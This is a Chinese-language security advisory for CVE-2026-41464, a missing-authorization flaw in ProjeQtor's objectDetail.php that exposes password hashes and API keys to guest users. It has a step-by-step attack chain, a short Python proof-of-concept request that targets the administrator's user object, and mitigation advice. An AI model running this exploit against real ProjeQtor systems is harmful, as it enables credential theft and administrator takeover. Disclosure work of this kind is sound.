CVE-2026-41464: ProjeQtor权限绕过致敏感数据泄露

漏洞信息

漏洞编号

CVE-2026-41464

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ProjeQtor

漏洞概述

ProjeQtor 项目管理软件在 7.0 至 12.4.3 版本中存在严重的权限缺失漏洞。该漏洞位于 objectDetail.php 端点，由于缺乏有效的授权验证机制，仅拥有低权限（访客级别）的认证用户即可绕过安全限制，直接访问并获取其他用户的敏感数据。攻击者利用此漏洞可窃取包括密码哈希和 API 密钥在内的关键信息，进而获取管理员凭据并进行权限提升，对系统安全构成严重威胁。

技术细节

该漏洞的核心在于 ProjeQtor 应用程序在处理 objectDetail.php 端点请求时未实施严格的访问控制检查。正常情况下，该端点应验证请求者是否具备查看特定对象的权限。然而，受影响版本的代码逻辑存在缺陷，未对请求者的身份与请求对象的所有权进行关联验证，也未校验调用接口所需的最低角色权限。

攻击者只需注册或获取一个低权限账户（如 Guest），即可利用该身份对应的 Session 发送 HTTP 请求。通过遍历或猜测目标对象的 ID（如管理员 ID），攻击者可以直接调用 objectDetail.php 接口获取详细信息。服务器在处理时错误地信任了会话状态，未进行二次鉴权便返回了数据库中的敏感字段，包括密码哈希和 API 密钥。攻击者利用这些凭据可破解密码或直接通过 API 密钥接管管理员权限。

攻击链分析

STEP 1

信息收集与注册

攻击者探测目标 ProjeQtor 系统，并注册或获取一个低权限的 Guest 账户。

STEP 2

身份认证

攻击者使用 Guest 账户登录系统，获取有效的会话 Cookie（如 PHPSESSID）。

STEP 3

漏洞利用

攻击者利用该会话 Cookie，构造并发送针对 objectDetail.php 端点的 HTTP 请求，修改参数中的 ID 以指向管理员用户对象。

STEP 4

数据窃取

服务器因权限校验缺失，返回了管理员用户的详细信息。攻击者从响应中提取密码哈希值和 API 密钥。

STEP 5

权限提升

攻击者利用获取的管理员密码哈希进行破解，或直接使用 API 密钥，以管理员身份接管系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://vulnerable-host.com"
vulnerable_endpoint = "/objectDetail.php"

# Attacker's low-privilege session cookie (obtained after login as guest)
attacker_cookie = {"PHPSESSID": "valid_guest_session_id"}

# Target object ID (e.g., Administrator ID is usually 1)
# objectClass parameter might be needed depending on implementation
params = {
    "id": "1",
    "objectClass": "User"
}

try:
    # Send request using the low-privilege session
    response = requests.get(
        target_host + vulnerable_endpoint,
        params=params,
        cookies=attacker_cookie,
        timeout=10
    )

    # Analyze response for sensitive data leakage
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        # Check for password hash or API key in response
        if "password" in response.text.lower() or "apikey" in response.text.lower():
            print("[+] Potential sensitive data leaked:")
            print(response.text[:500]) # Print snippet
        else:
            print("[-] No obvious sensitive data found in response.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error during exploitation: {e}")

影响范围

ProjeQtor >= 7.0, <= 12.4.3

防御指南

临时缓解措施

建议立即升级至官方修复版本以彻底解决该漏洞。若暂时无法升级，应通过 WAF 或网络访问控制列表（ACL）限制对 objectDetail.php 端点的外部访问，或暂时禁用 Guest 账户的注册及登录功能，并对现有低权限账户进行严格审计，以降低被利用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-41464
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-41464
3 Details https://www.cvedetails.com/cve/CVE-2026-41464/
4 VulDB https://vuldb.com/cve/CVE-2026-41464
5 Link https://damiri.fr/en/cves/CVE-2026-41464
6 Link https://gryfman.fr/cves/CVE-2026-41464
7 Link https://www.projeqtor.com
8 Link https://www.vulncheck.com/advisories/projeqtor-missing-authorization-via-objectdetail-php